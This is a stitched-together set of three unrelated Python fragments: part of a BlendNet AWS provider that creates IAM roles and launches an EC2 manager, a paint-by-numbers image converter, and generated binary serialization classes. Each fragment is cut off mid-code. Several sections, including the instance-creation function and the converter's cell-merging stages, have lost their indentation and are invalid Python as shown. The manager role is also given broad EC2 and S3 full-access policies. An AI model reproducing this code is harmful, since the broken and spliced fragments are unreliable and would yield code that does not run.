        parsed = json.loads(result.stdout)
    except UnicodeDecodeError as e:
        print('WARN: Found UnicodeDecodeError during parsing the aws output, switching to ISO-8859-1:', str(e))
        parsed = json.loads(result.stdout.decode('iso-8859-1'))
    except json.decoder.JSONDecodeError:
        pass
    return parsed
def initProvider(settings=None):
    '''Init provider configuration.

    Locates the "aws" CLI tool, prepares the execution prefix and loads the
    tool configuration. Returns True on success, otherwise a string
    describing the error.
    '''
    from .. import findPATHExec
    global AWS_CONF
    # BUG FIX: the original default `settings = dict()` was a shared mutable
    # object; the writes below (via AWS_CONF) leaked between no-arg calls.
    AWS_CONF = settings if settings is not None else dict()
    if not AWS_CONF.get('aws_tool_path'):
        AWS_CONF['aws_tool_path'] = findPATHExec('aws')
    if not AWS_CONF['aws_tool_path']:
        return 'Unable to find "aws" in PATH - check the provider documentation and install the requirements'
    if not os.path.isfile(AWS_CONF['aws_tool_path']):
        path = AWS_CONF['aws_tool_path']
        AWS_CONF['aws_tool_path'] = None
        return 'The provided "aws" exec path is invalid: %s' % (path,)
    global AWS_EXEC_PREFIX, AWS_CONFIGS
    AWS_EXEC_PREFIX = (AWS_CONF['aws_tool_path'], '--output', 'json')
    AWS_CONFIGS = None  # invalidate the cache so _getConfigs() re-reads
    configs = _getConfigs()
    if not configs:
        AWS_CONF['aws_tool_path'] = None
        return 'Error during execution of "aws" tool'
    print('INFO: Using aws tool:', AWS_CONF['aws_tool_path'])
    if 'region' in configs:
        print('INFO: Set region for aws tool: ' + configs['region'])
        AWS_EXEC_PREFIX += ('--region', configs['region'])
    return True
def checkDependencies(settings):
    '''Ensure the provider is usable; (re)initialize it when it is not.'''
    if AWS_CONF.get('aws_tool_path'):
        return True
    return initProvider(settings)
def getSettings():
    '''Returns the available settings of the provider'''
    # NOTE(review): the exposed key is 'aws_exec_path' while the stored config
    # key is 'aws_tool_path' - confirm the settings UI maps one to the other.
    return {
        'aws_exec_path': {
            'name': 'Path to aws exec',
            'description': 'Full path to the aws or aws.exe from AWS CLI v2, by default uses PATH env to find it',
            'type': 'path',
            'value': AWS_CONF.get('aws_tool_path'),
        },
        'bucket_name': {
            'name': 'Bucket name',
            'description': '''What the bucket to use - in case it's empty will create the new one as "blendnet-{session_id}"''',
            'type': 'string',
            'value': AWS_CONF.get('bucket_name', ''),
        },
    }
def _getConfigs():
    '''Returns dict with aws tool configs (cached in AWS_CONFIGS).

    Discovers the configured parameter names from `aws configure list`,
    reads each value with `aws configure get <param>`, and - when running
    on an EC2 instance - fills a missing region from the instance identity
    document.
    '''
    global AWS_CONFIGS
    if not AWS_CONFIGS:
        configs = dict()
        # aws configure returns non-json table, so using direct call
        result = subprocess.run([AWS_CONF['aws_tool_path'], 'configure', 'list'], stdout=subprocess.PIPE)
        if result.returncode != 0:
            print('ERROR: Unable to get aws config: %s %s' % (result.returncode, result.stdout))
            return configs
        data = result.stdout
        try:
            data = data.decode('utf-8').strip()
        except (LookupError, UnicodeDecodeError):
            # UTF-8 not worked, so probably it's latin1
            data = data.decode('iso-8859-1').strip()
        # NOTE(review): splitting on os.linesep assumes the tool emits the
        # platform line ending, and line.split()[0] would raise on an empty
        # line - confirm against real `aws configure list` output.
        # The [2:] slice skips the two table-header lines.
        for line in data.split(os.linesep)[2:]:
            param = line.split()[0]
            result = subprocess.run([AWS_CONF['aws_tool_path'], 'configure', 'get', param], stdout=subprocess.PIPE)
            if result.returncode == 0:
                try:
                    configs[param] = result.stdout.decode('utf-8').strip()
                except (LookupError, UnicodeDecodeError):
                    # UTF-8 not worked, so probably it's latin1
                    configs[param] = result.stdout.decode('iso-8859-1').strip()
        if checkLocation():
            print('INFO: Receiving configuration from the instance metadata')
            json_data = _requestMetadata('dynamic/instance-identity/document')
            data = None
            if json_data is not None:
                try:
                    data = json.loads(json_data)
                except json.decoder.JSONDecodeError:
                    print('ERROR: Unable to parse the instance json metadata: %s' % json_data)
                    pass
            if data is not None:
                # Explicitly configured region wins; metadata only fills a gap
                configs['region'] = configs.get('region', data['region'])
        AWS_CONFIGS = configs
    return AWS_CONFIGS
def getProviderInfo():
    '''Collect the aws tool configuration plus the interesting EC2 quotas.'''
    configs = dict()
    try:
        configs = _getConfigs()
        # Short display names keyed by the official AWS quota name
        useful_quotas = {
            'Running On-Demand Standard (A, C, D, H, I, M, R, T, Z) instances': 'Std instances',
            'Running On-Demand F instances': 'F instances',
            'Running On-Demand G instances': 'G instances',
            'Running On-Demand Inf instances': 'Inf instances',
            'Running On-Demand P instances': 'P instances',
            'Running On-Demand X instances': 'X instances',
        }
        # Get quotas
        quota_data = _executeAwsTool('service-quotas', 'list-service-quotas',
                                     '--service-code', 'ec2', '--query', 'Quotas[].[QuotaName, Value]')
        for quota_name, quota_value in quota_data:
            if quota_name in useful_quotas:
                configs['Quota: ' + useful_quotas[quota_name]] = '%.1f' % (quota_value,)
    except AwsToolException as e:
        configs['ERRORS'] = ['Looks like access to the API is restricted '
                             '- please check your permissions: %s' % e]
    return configs
def getInstanceTypes():
    '''Return {instance_type: (human description, RAM in GB)} for the region.

    On API/permission failure returns {'ERROR': <description>} instead.
    '''
    try:
        data = _executeAwsTool('ec2', 'describe-instance-types',
                               '--query', 'InstanceTypes[].[InstanceType, VCpuInfo.DefaultVCpus, MemoryInfo.SizeInMiB] | sort_by(@, &[0])')
        # d = [type_name, default_vcpus, memory_mib]
        return dict([ (d[0], ('%s vCPUs %s GB RAM' % (d[1], d[2]/1024.0), d[2]/1024.0)) for d in data ])
    except AwsToolException as e:
        return {'ERROR': 'Looks like access to the API is restricted '
                '- please check your permissions: %s' % e}
    # BUG FIX: the original ended with an unreachable `return {}` - both
    # branches above already return; it has been removed.
def _createRoles():
    '''Will ensure the required roles are here

    Creates the IAM roles and instance profiles used by BlendNet:
      - blendnet-agent: S3 read-only (render agents)
      - blendnet-manager: full EC2 + S3, plus iam:PassRole for the agent
    Existing roles are left untouched ("(EntityAlreadyExists)" errors are
    treated as success).
    '''
    # Trust policy letting EC2 instances assume the roles created below
    role_doc = {
        "Statement": [{
            "Effect": "Allow",
            "Principal": {
                "Service":"ec2.amazonaws.com"
            },
            "Action":"sts:AssumeRole",
        }],
    }
    # Create blendnet-agent role
    try:
        _executeAwsTool('iam', 'create-role',
                        '--role-name', 'blendnet-agent',
                        '--description', 'Automatically created by BlendNet',
                        '--assume-role-policy-document', json.dumps(role_doc))
        _executeAwsTool('iam', 'wait', 'role-exists',
                        '--role-name', 'blendnet-agent')
        print('INFO: Creating the instance profile for role blendnet-agent')
        _executeAwsTool('iam', 'attach-role-policy',
                        '--role-name', 'blendnet-agent',
                        '--policy-arn', 'arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess')
        _executeAwsTool('iam', 'create-instance-profile',
                        '--instance-profile-name', 'blendnet-agent')
        _executeAwsTool('iam', 'add-role-to-instance-profile',
                        '--instance-profile-name', 'blendnet-agent',
                        '--role-name', 'blendnet-agent')
        _executeAwsTool('iam', 'wait', 'instance-profile-exists',
                        '--instance-profile-name', 'blendnet-agent')
    except AwsToolException as e:
        # An already-created role is fine; anything else is a real failure
        if '(EntityAlreadyExists)' not in str(e):
            raise
        print('INFO: Role blendnet-agent already exists')
    # Create blendnet-manager role
    try:
        _executeAwsTool('iam', 'create-role',
                        '--role-name', 'blendnet-manager',
                        '--description', 'Automatically created by BlendNet',
                        '--assume-role-policy-document', json.dumps(role_doc))
        print('INFO: Creating the instance profile for role blendnet-manager')
        _executeAwsTool('iam', 'wait', 'role-exists',
                        '--role-name', 'blendnet-manager')
        # Those perms could be neared down - but I think it's too much for now
        _executeAwsTool('iam', 'attach-role-policy',
                        '--role-name', 'blendnet-manager',
                        '--policy-arn', 'arn:aws:iam::aws:policy/AmazonEC2FullAccess')
        _executeAwsTool('iam', 'attach-role-policy',
                        '--role-name', 'blendnet-manager',
                        '--policy-arn', 'arn:aws:iam::aws:policy/AmazonS3FullAccess')
        # Allow blendnet-manager to use blendnet-agent instance profile and role
        agent_instance_profile = _executeAwsTool('iam', 'get-instance-profile',
                                                 '--instance-profile-name', 'blendnet-agent',
                                                 '--query', 'InstanceProfile')
        policy_doc = {
            "Statement": [{
                "Effect": "Allow",
                "Action": "iam:PassRole",
                "Resource": [
                    agent_instance_profile['Arn'],
                    agent_instance_profile['Roles'][0]['Arn'],
                ],
            }],
        }
        _executeAwsTool('iam', 'put-role-policy',
                        '--role-name', 'blendnet-manager',
                        '--policy-name', 'allow_use_blendnet-agent',
                        '--policy-document', json.dumps(policy_doc))
        _executeAwsTool('iam', 'create-instance-profile',
                        '--instance-profile-name', 'blendnet-manager')
        _executeAwsTool('iam', 'add-role-to-instance-profile',
                        '--instance-profile-name', 'blendnet-manager',
                        '--role-name', 'blendnet-manager')
        _executeAwsTool('iam', 'wait', 'instance-profile-exists',
                        '--instance-profile-name', 'blendnet-manager')
        # If it's not wait - we will see the next error during manager allocation
        # Value (blendnet-manager) for parameter iamInstanceProfile.name is invalid. Invalid IAM Instance Profile name
        # (IAM propagation is eventually consistent, hence the fixed delay)
        time.sleep(30)
    except AwsToolException as e:
        if '(EntityAlreadyExists)' not in str(e):
            raise
        print('INFO: Role blendnet-manager already exists')
def _getImageAmi(name='debian-10-amd64-daily-*'):
    '''Return (image_id, root_device_name) of the newest AMI matching name.'''
    filters = json.dumps([{'Name':'name','Values': [name]}])
    # Sort ascending by creation date and take the last (= latest) entry
    query = 'sort_by(Images, &CreationDate)[].[Name,ImageId,BlockDeviceMappings[0].DeviceName][-1]'
    data = _executeAwsTool('ec2', 'describe-images',
                           '--filters', filters,
                           '--query', query)
    print('INFO: Got image %s' % (data[1],))
    return (data[1], data[2])
def _getInstanceId(instance_name):
    '''Return the id of the single not-terminated instance tagged with
    Name=instance_name, or None when there is no unique match.'''
    alive_states = ['pending','running','shutting-down','stopping','stopped']
    data = _executeAwsTool('ec2', 'describe-instances',
                           '--filters', json.dumps([
                               {'Name':'tag:Name','Values': [instance_name]},
                               {'Name':'instance-state-name','Values': alive_states},
                           ]),
                           '--query', 'Reservations[].Instances[].InstanceId')
    return data[0] if len(data) == 1 else None
def createInstanceManager(cfg):
'''Creating a new instance for BlendNet Manager'''
_createRoles()
inst_id = _getInstanceId(cfg['instance_name'])
if inst_id:
# The instance is already exists
return inst_id
image = _getImageAmi()
disk_config = [{
'DeviceName': image[1],
'Ebs': {
'DeleteOnTermination': True,
'VolumeSize': 200,
'VolumeType': 'standard',
},
}]
# TODO: make script overridable
# TODO: too much hardcode here
startup_script = '''#!/bin/sh
echo '--> Check for blender dependencies'
dpkg -l libxrender1 libxi6 libgl1
if [ $? -gt 0 ]; then
apt update
apt install --no-install-recommends -y libxrender1 libxi6 libgl1
fi
if [ ! -x /srv/blender/blender ]; then
echo '--> Download & unpack blender'
echo "{blender_sha256} -" > /tmp/blender.sha256
curl -fLs "{blender_url}" | tee /tmp/blender.tar.bz2 | sha256sum -c /tmp/blender.sha256 || (echo "ERROR: checksum of the blender binary is incorrect"; exit 1)
mkdir -p /srv/blender
tar -C /srv/blender --strip-components=1 --checkpoint=10000 --checkpoint-action=echo='Unpacked %{{r}}T' -xf /tmp/blender.tar.bz2
fi
cat <<'EOF' > /usr/local/bin/blendnet_cloud_init.sh
#!/bin/sh
echo '--> Update the BlendNet manager'
aws s3 cp --recursive '{storage_url}/work_manager' "$(getent passwd blendnet-user | cut -d: -f6)"
aws s3 rm --recursive '{storage_url}/work_manager'
aws s3 cp --recursive '{storage_url}/blendnet' /srv/blendnet
EOF
chmod +x /usr/local/bin/blendnet_cloud_init.sh
adduser --shell /bin/false --disabled-password blendnet-user
cat <<'EOF' > /etc/systemd/system/blendnet-manager.service
[Unit]
Description=BlendNet Manager Service
After=network-online.target google-network-daemon.service
[Service]
PermissionsStartOnly=true
User=blendnet-user
WorkingDirectory=~
Type=simple
ExecStartPre=/usr/local/bin/blendnet_cloud_init.sh
ExecStart=/srv/blender/blender -b -noaudio -P /srv/blendnet/manager.py
Restart=always
TimeoutStopSec=60
StandardOutput=syslog
StandardError=syslog
[Install]
WantedBy=multi-user.target
EOF
echo '--> Run the BlendNet manager'
systemctl daemon-reload
systemctl enable blendnet-manager.service
systemctl start blendnet-manager.service
'''.format(
blender_url=cfg['dist_url'],
blender_sha256=cfg['dist_checksum'],
storage_url=cfg['storage_url'],
)
options = [
'ec2', 'run-instances',
'--tag-specifications', 'ResourceType=instance,Tags=['
'{Key=Name,Value=%s},'
'{Key=Session,Value=%s},'
'{Key=Type,Value=manager}]' % (cfg['instance_name'], cfg['session_id']),
'--image-id', image[0],
'--instance-type', cfg['instance_type'],
'--iam-instance-profile', '{"Name":"blendnet-manager"}',
'--block-device-mappings', json.dumps(disk_config),
#'--key-name', 'default_key', # If you | |
# This converter has code borrowed from here:
# https://codegolf.stackexchange.com/questions/42217/paint-by-numbers
import random
import time
from collections import defaultdict
from argparse import ArgumentParser
from pathlib import Path
from PIL import Image
if __name__ == '__main__':
    # Every tunable of the pipeline is exposed as a CLI flag; the parsed
    # values are copied into the UPPER_CASE names the stages below read.
    # NOTE(review): the rest of the script reads these names at module level,
    # so the converter only works when run directly as a script - confirm.
    root_path = Path("converter_1")
    parser = ArgumentParser()
    parser.add_argument(
        '--input', type=str, help='file with input image in RGB workspace',
        metavar='INPUT_FILE', required=True)
    parser.add_argument(
        '--output', type=str, help='output file',
        metavar='OUTPUT_FILE', required=False, default=root_path / "out")
    parser.add_argument(
        '--output-folder', type=str, help='output folder',
        metavar='OUTPUT_FOLDER', required=False, default=root_path / "out-folder")
    parser.add_argument(
        '--p', type=int, help='P - maximum numbers of distinct colors in palette',
        metavar='P_VAR', default=30)
    parser.add_argument(
        '--n', type=int, help='N - maximum number of cells to use',
        metavar='N_VAR', default=500)
    # NOTE(review): --verbose is type=int with default=False; it is only
    # used for truthiness, but 'default=0' would be cleaner - confirm.
    parser.add_argument(
        '--verbose', type=int, help='Verbose flag - if true than each step produces an intermediate result',
        metavar='VERBOSE', default=False)
    parser.add_argument(
        '--flood-fill-tolerance', type=int, help='Flood fill tolerance',
        metavar='FFT_VAR', default=10)
    parser.add_argument(
        '--close-cell-tolerance', type=int, help='Close cell tolerance',
        metavar='CCT_VAR', default=5)
    parser.add_argument(
        '--small-cell-threshold', type=int, help='Small cell threshold',
        metavar='SMT_VAR', default=10)
    parser.add_argument(
        '--first-pass-n-ratio', type=float, help='First pass N ratio',
        metavar='FPNR_VAR', default=1.5)
    parser.add_argument(
        '--k-means-trials', type=int, help='K-Means trial count',
        metavar='KMEANS_VAR', default=30)
    parser.add_argument(
        '--blur-radius', type=int, help='Blur radius',
        metavar='BLUR_RADIUS_VAR', default=2)
    parser.add_argument(
        '--blur-runs', type=int, help='Blur runs',
        metavar='BLUR_RUNS_VAR', default=3)
    args = parser.parse_args()
    print(args)
    INFILE = args.input
    OUTFILE_STEM = str(args.output_folder)
    OUTFILE = str(args.output)
    P = args.p
    N = args.n
    OUTPUT_ALL = args.verbose # Whether to output the image at each step
    FLOOD_FILL_TOLERANCE = args.flood_fill_tolerance
    CLOSE_CELL_TOLERANCE = args.close_cell_tolerance
    SMALL_CELL_THRESHOLD = args.small_cell_threshold
    FIRST_PASS_N_RATIO = args.first_pass_n_ratio
    K_MEANS_TRIALS = args.k_means_trials
    BLUR_RADIUS = args.blur_radius
    BLUR_RUNS = args.blur_runs
"""
Color conversion functions
"""
X = range
# http://www.easyrgb.com/?X=MATH
def rgb2xyz(rgb):
    """Convert an sRGB triple (0-255 per channel) to CIE XYZ (0-100 scale)."""
    linear = []
    for value in rgb:
        value /= 255
        # Inverse sRGB companding (gamma expansion)
        if value > 0.04045:
            value = ((value + 0.055) / 1.055) ** 2.4
        else:
            value /= 12.92
        linear.append(value * 100)
    r, g, b = linear
    # sRGB -> XYZ matrix (D65 white point)
    x = r * 0.4124 + g * 0.3576 + b * 0.1805
    y = r * 0.2126 + g * 0.7152 + b * 0.0722
    z = r * 0.0193 + g * 0.1192 + b * 0.9505
    return x, y, z
def xyz2lab(xyz):
    """Convert CIE XYZ (0-100 scale) to CIE L*a*b* (D65 reference white)."""
    white = (95.047, 100, 108.883)
    fx, fy, fz = [
        t ** (1 / 3) if t > 0.008856 else 7.787 * t + 16 / 116
        for t in (component / ref for component, ref in zip(xyz, white))
    ]
    return 116 * fy - 16, 500 * (fx - fy), 200 * (fy - fz)
def rgb2lab(rgb):
    """Convert an sRGB triple straight to CIE L*a*b*."""
    return xyz2lab(rgb2xyz(rgb))
def lab2xyz(lab):
    """Convert CIE L*a*b* back to CIE XYZ (inverse of xyz2lab)."""
    L, a, b = lab
    fy = (L + 16) / 116
    fx = a / 500 + fy
    fz = fy - b / 200

    def _inverse(t):
        # Inverse of the xyz2lab cube-root companding
        return t ** 3 if t ** 3 > 0.008856 else (t - 16 / 116) / 7.787

    return _inverse(fx) * 95.047, _inverse(fy) * 100, _inverse(fz) * 108.883
def xyz2rgb(xyz):
    """Convert CIE XYZ (0-100 scale) to sRGB floats on the 0-255 scale.

    Values are neither rounded nor clamped; see lab2rgb for rounding.
    """
    x, y, z = (component / 100 for component in xyz)
    # XYZ -> linear sRGB matrix (D65 white point)
    linear = (
        x * 3.2406 + y * -1.5372 + z * -0.4986,
        x * -0.9689 + y * 1.8758 + z * 0.0415,
        x * 0.0557 + y * -0.2040 + z * 1.0570,
    )
    out = []
    for c in linear:
        # Forward sRGB companding (gamma compression)
        if c > 0.0031308:
            c = 1.055 * (c ** (1 / 2.4)) - 0.055
        else:
            c *= 12.92
        out.append(c * 255)
    return tuple(out)
def lab2rgb(lab): rgb = xyz2rgb(lab2xyz(lab));return tuple([int(round(x)) for x in rgb])
"""
Stage 1: Read in image and convert to CIELAB
"""
total_time = time.time()
im = Image.open(INFILE)
width, height = im.size
if OUTPUT_ALL:
im.save(OUTFILE_STEM + "0.png")
print("Saved image %s0.png" % OUTFILE_STEM)
def make_pixlab_map(im):
    """Return {(x, y): Lab-color} for every pixel of *im*.

    Uses Image.load() to obtain a pixel-access object once instead of
    calling im.getpixel() per pixel - the documented fast path in Pillow
    for per-pixel reads. The produced mapping is identical.
    """
    width, height = im.size
    pixels = im.load()
    return {(i, j): rgb2lab(pixels[i, j])
            for i in range(width) for j in range(height)}
# Working in Lab makes the later color-distance comparisons perceptual
pixlab_map = make_pixlab_map(im)
print("Stage 1: CIELAB conversion complete")
"""
Stage 2: Partitioning the image into like-colored cells using flood fill
"""
def d(color1, color2):
    """Euclidean distance between two Lab colors."""
    return sum((p - q) ** 2 for p, q in zip(color1, color2)) ** .5
def neighbours(pixel):
    """4-connected neighbours of *pixel* that lie inside the image bounds."""
    i, j = pixel
    candidates = ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1))
    return [c for c in candidates
            if 0 <= c[0] < width and 0 <= c[1] < height]
def flood_fill(start_pixel):
    """Grow a cell of near-identical color outward from start_pixel.

    Pixels whose Lab distance to start_pixel's color is below
    FLOOD_FILL_TOLERANCE are claimed into the cell and removed from the
    module-level unplaced_pixels set; rejected pixels are remembered in
    `searched` so each is tested at most once per fill.
    """
    to_search = {start_pixel}
    cell = set()
    searched = set()
    start_color = pixlab_map[start_pixel]
    while to_search:
        pixel = to_search.pop()
        if d(start_color, pixlab_map[pixel]) < FLOOD_FILL_TOLERANCE:
            cell.add(pixel)
            unplaced_pixels.remove(pixel)  # claim: mutates the global set
            for n in neighbours(pixel):
                if n in unplaced_pixels and n not in cell and n not in searched:
                    to_search.add(n)
        else:
            searched.add(pixel)
    return cell
# These two maps are inverses, pixel/s <-> number of cell containing pixel
cell_sets = {}
pixcell_map = {}
unplaced_pixels = {(i, j) for i in X(width) for j in X(height)}
while unplaced_pixels:
    # Peek (pop + re-add) an arbitrary seed; flood_fill removes what it claims
    start_pixel = unplaced_pixels.pop()
    unplaced_pixels.add(start_pixel)
    cell = flood_fill(start_pixel)
    cellnum = len(cell_sets)  # cell ids are dense 0..k-1 at this stage
    cell_sets[cellnum] = cell
    for pixel in cell:
        pixcell_map[pixel] = cellnum
print("Stage 2: Flood fill partitioning complete, %d cells" % len(cell_sets))
"""
Stage 3: Merge cells with less than a specified threshold amount of pixels to reduce the number of cells
Also good for getting rid of some noise
"""
def mean_color(cell, color_map):
L_sum = 0
a_sum = 0
b_sum = 0
for pixel in cell:
L, a, b = color_map[pixel]
L_sum += L
a_sum += a
b_sum += b
return L_sum / len(cell), a_sum / len(cell), b_sum / len(cell)
def remove_small(cell_size):
    """Merge every cell of size <= cell_size into its most-bordered neighbour.

    Mutates the module-level cell_sets and pixcell_map. Returns early once
    the cell count has dropped to the target N.
    """
    if len(cell_sets) <= N:
        return
    small_cells = []
    for cellnum in cell_sets:
        if len(cell_sets[cellnum]) <= cell_size:
            small_cells.append(cellnum)
    for cellnum in small_cells:
        # Count how often each neighbouring cell borders this one
        neighbour_cells = []
        for cell in cell_sets[cellnum]:
            for n in neighbours(cell):
                neighbour_reg = pixcell_map[n]
                if neighbour_reg != cellnum:
                    neighbour_cells.append(neighbour_reg)
        # The most frequent bordering cell absorbs this one
        closest_cell = max(neighbour_cells, key=neighbour_cells.count)
        for cell in cell_sets[cellnum]:
            pixcell_map[cell] = closest_cell
        if len(cell_sets[closest_cell]) <= cell_size:
            # NOTE(review): assumes closest_cell is still pending in
            # small_cells; a ValueError here would mean it was already
            # merged away - confirm this cannot happen.
            small_cells.remove(closest_cell)
        cell_sets[closest_cell] |= cell_sets[cellnum]
        del cell_sets[cellnum]
        if len(cell_sets) <= N:
            return
# Try increasingly large size thresholds until the cell-count target is met
for cell_size in X(1, SMALL_CELL_THRESHOLD):
    remove_small(cell_size)
if OUTPUT_ALL:
    # Step-1 snapshot: each cell painted with its mean color
    frame_im = Image.new("RGB", im.size)
    for cellnum in cell_sets:
        cell_color = mean_color(cell_sets[cellnum], pixlab_map)
        for pixel in cell_sets[cellnum]:
            frame_im.putpixel(pixel, lab2rgb(cell_color))
    frame_im.save(OUTFILE_STEM + "1.png")
    print("Saved image %s1.png" % OUTFILE_STEM)
print("Stage 3: Small cell merging complete, %d cells" % len(cell_sets))
"""
Stage 4: Close color merging
"""
cell_means = {}
for cellnum in cell_sets:
cell_means[cellnum] = mean_color(cell_sets[cellnum], pixlab_map)
n_graph = defaultdict(set)
for i in X(width):
for j in X(height):
pixel = (i, j)
cell = pixcell_map[pixel]
for n in neighbours(pixel):
neighbour_cell = pixcell_map[n]
if neighbour_cell != cell:
n_graph[cell].add(neighbour_cell)
n_graph[neighbour_cell].add(cell)
def merge_cells(merge_from, merge_to):
    """Fold cell merge_from into merge_to, updating all module-level maps.

    Rewrites pixcell_map entries, splices the adjacency graph (removing
    merge_from and reconnecting its neighbours to merge_to), and refreshes
    merge_to's mean color.
    """
    merge_from_cell = cell_sets[merge_from]
    for pixel in merge_from_cell:
        pixcell_map[pixel] = merge_to
    del cell_sets[merge_from]
    del cell_means[merge_from]
    n_graph[merge_to] |= n_graph[merge_from]
    n_graph[merge_to].remove(merge_to)  # no self-edges
    for n in n_graph[merge_from]:
        n_graph[n].remove(merge_from)
        if n != merge_to:
            n_graph[n].add(merge_to)
    del n_graph[merge_from]
    cell_sets[merge_to] |= merge_from_cell
    cell_means[merge_to] = mean_color(cell_sets[merge_to], pixlab_map)
# Go through the cells from largest to smallest. Keep replenishing the list while we can still merge.
last_time = time.time()  # throttle for the periodic progress message
to_search = sorted(cell_sets.keys(), key=lambda x: len(cell_sets[x]), reverse=True)
# NOTE(review): full_list appears to track whether to_search still holds
# every remaining cell - confirm against the merge loop that follows.
full_list = True
while len(cell_sets) > N and to_search:
if time.time() - last_time > 15:
last_time = time.time()
print("Close color merging... (%d cells remaining)" % len(cell_sets))
while to_search:
cellnum = to_search.pop()
close_cells = []
for neighbour_cellnum in n_graph[cellnum]:
if d(cell_means[cellnum], cell_means[neighbour_cellnum]) < CLOSE_CELL_TOLERANCE:
close_cells.append(neighbour_cellnum)
if close_cells:
for neighbour_cellnum in close_cells:
merge_cells(neighbour_cellnum, cellnum)
if | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
# python imports
import sys
import struct
from enum import Enum
PY3 = sys.version_info > (3,)
class EColor(Enum):
    # NOTE(review): values are non-contiguous and include negatives -
    # presumably fixed protocol values, so do not renumber without
    # checking the peer definitions.
    White = 0
    Red = 3
    Green = 4
    Blue = -2
    Black = -1
class Parent(object):
    """Hand-rolled binary-serializable record with two optional string fields.

    Wire format per optional string field:
      1 byte  - presence flag (0x00 = None, 0x01 = present)
      1 byte  - K, the number of significant length bytes that follow
      K bytes - struct-packed 'I' length with trailing zero bytes stripped
      N bytes - the string itself, encoded as ISO-8859-1

    NOTE(review): 'I' packs in native byte order; the trailing-zero-stripping
    scheme only round-trips on little-endian hosts - confirm whether a
    portable '<I' is required.
    """

    @staticmethod
    def name():
        # Type tag of this record
        return 'Parent'

    def __init__(self, first_name=None, _last_name_=None):
        self.initialize(first_name, _last_name_)

    def initialize(self, first_name=None, _last_name_=None):
        # Both fields are optional text values (str on Python 3)
        self.first_name = first_name
        self._last_name_ = _last_name_

    def serialize(self):
        """Return the bytes encoding of this record (see class docstring)."""
        s = b''
        # serialize self.first_name
        s += b'\x00' if self.first_name is None else b'\x01'
        if self.first_name is not None:
            tmp0 = b''
            tmp0 += struct.pack('I', len(self.first_name))
            # Strip trailing zero bytes of the packed length (compact form)
            while len(tmp0) and tmp0[-1] == b'\x00'[0]:
                tmp0 = tmp0[:-1]
            s += struct.pack('B', len(tmp0))
            s += tmp0
            s += self.first_name.encode('ISO-8859-1') if PY3 else self.first_name
        # serialize self._last_name_
        s += b'\x00' if self._last_name_ is None else b'\x01'
        if self._last_name_ is not None:
            tmp1 = b''
            tmp1 += struct.pack('I', len(self._last_name_))
            while len(tmp1) and tmp1[-1] == b'\x00'[0]:
                tmp1 = tmp1[:-1]
            s += struct.pack('B', len(tmp1))
            s += tmp1
            s += self._last_name_.encode('ISO-8859-1') if PY3 else self._last_name_
        return s

    def deserialize(self, s, offset=0):
        """Decode the fields from s starting at offset; return the new offset."""
        # deserialize self.first_name
        tmp2 = struct.unpack('B', s[offset:offset + 1])[0]  # presence flag
        offset += 1
        if tmp2:
            tmp3 = struct.unpack('B', s[offset:offset + 1])[0]  # K length bytes
            offset += 1
            tmp4 = s[offset:offset + tmp3]
            offset += tmp3
            # Re-pad the compact length to 4 bytes before unpacking
            tmp4 += b'\x00' * (4 - tmp3)
            tmp5 = struct.unpack('I', tmp4)[0]
            self.first_name = s[offset:offset + tmp5].decode('ISO-8859-1') if PY3 else s[offset:offset + tmp5]
            offset += tmp5
        else:
            self.first_name = None
        # deserialize self._last_name_
        tmp6 = struct.unpack('B', s[offset:offset + 1])[0]
        offset += 1
        if tmp6:
            tmp7 = struct.unpack('B', s[offset:offset + 1])[0]
            offset += 1
            tmp8 = s[offset:offset + tmp7]
            offset += tmp7
            tmp8 += b'\x00' * (4 - tmp7)
            tmp9 = struct.unpack('I', tmp8)[0]
            self._last_name_ = s[offset:offset + tmp9].decode('ISO-8859-1') if PY3 else s[offset:offset + tmp9]
            offset += tmp9
        else:
            self._last_name_ = None
        return offset
class Child(Parent):
    """A Parent record extended with one more optional string field ``c``.

    ``c`` is serialized after the parent fields using the same presence
    byte + compact length prefix + ISO-8859-1 payload layout.
    """

    @staticmethod
    def name():
        return 'Child'

    def __init__(self, first_name=None, _last_name_=None, c=None):
        self.initialize(first_name, _last_name_, c)

    def initialize(self, first_name=None, _last_name_=None, c=None):
        Parent.initialize(self, first_name, _last_name_)
        self.c = c

    def serialize(self):
        """Return parent bytes followed by the packed ``c`` field."""
        buf = Parent.serialize(self)
        if self.c is None:
            return buf + b'\x00'
        buf += b'\x01'
        # compact length prefix: trim trailing zero bytes of the uint32 length
        length = struct.pack('I', len(self.c))
        while len(length) and length[-1] == b'\x00'[0]:
            length = length[:-1]
        buf += struct.pack('B', len(length)) + length
        buf += self.c.encode('ISO-8859-1') if PY3 else self.c
        return buf

    def deserialize(self, s, offset=0):
        """Read parent fields, then ``c``; return the offset past the data."""
        offset = Parent.deserialize(self, s, offset)
        present = struct.unpack('B', s[offset:offset + 1])[0]
        offset += 1
        if not present:
            self.c = None
            return offset
        nbytes = struct.unpack('B', s[offset:offset + 1])[0]
        offset += 1
        raw = s[offset:offset + nbytes] + b'\x00' * (4 - nbytes)
        offset += nbytes
        length = struct.unpack('I', raw)[0]
        self.c = s[offset:offset + length].decode('ISO-8859-1') if PY3 else s[offset:offset + length]
        return offset + length
class Test(object):
    @staticmethod
    def name():
        # Symbolic name of this type (mirrors Parent.name / Child.name).
        return 'Test'
    def __init__(self, v0=None, v1=None, v2=None, v3=None, v4=None, v5=None, v6=None, v7=None, v8=None, v9=None, v10=None, v11=None, v12=None, v13=None, v14=None, v15=None, v16=None, v17=None, v18=None, v19=None, v20=None, v21=None, v22=None, v23=None):
        # Delegates to initialize() so instances can be re-initialized in place.
        self.initialize(v0, v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23)
    def initialize(self, v0=None, v1=None, v2=None, v3=None, v4=None, v5=None, v6=None, v7=None, v8=None, v9=None, v10=None, v11=None, v12=None, v13=None, v14=None, v15=None, v16=None, v17=None, v18=None, v19=None, v20=None, v21=None, v22=None, v23=None):
        """Assign all 24 generated test fields verbatim.

        A value of None marks the field as absent on the wire (serialize
        writes a 0x00 presence byte for None fields).
        """
        self.v0 = v0
        self.v1 = v1
        self.v2 = v2
        self.v3 = v3
        self.v4 = v4
        self.v5 = v5
        self.v6 = v6
        self.v7 = v7
        self.v8 = v8
        self.v9 = v9
        self.v10 = v10
        self.v11 = v11
        self.v12 = v12
        self.v13 = v13
        self.v14 = v14
        self.v15 = v15
        self.v16 = v16
